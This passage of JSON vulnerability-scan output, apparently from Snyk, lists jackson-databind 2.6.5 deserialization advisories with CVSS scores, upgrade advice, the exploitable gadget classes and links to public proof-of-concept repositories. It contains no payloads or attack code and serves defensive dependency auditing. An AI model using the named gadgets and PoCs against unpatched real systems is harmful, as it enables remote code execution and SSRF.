"version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.622591Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36185" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:36:40.536722Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:34:52Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.303463Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:01.307628Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.513059Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36189" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:37:54.679882Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:37:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.089230Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.824076Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36188", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.488317Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36188" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:39:28.531700Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:32Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:03.468032Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Poc" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.757298Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36181" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:41:09.172252Z", - "functions_new": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.686589Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Yangkun (ICSL)" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2854", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", - "title": "GitHub Release" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:04.169362Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ 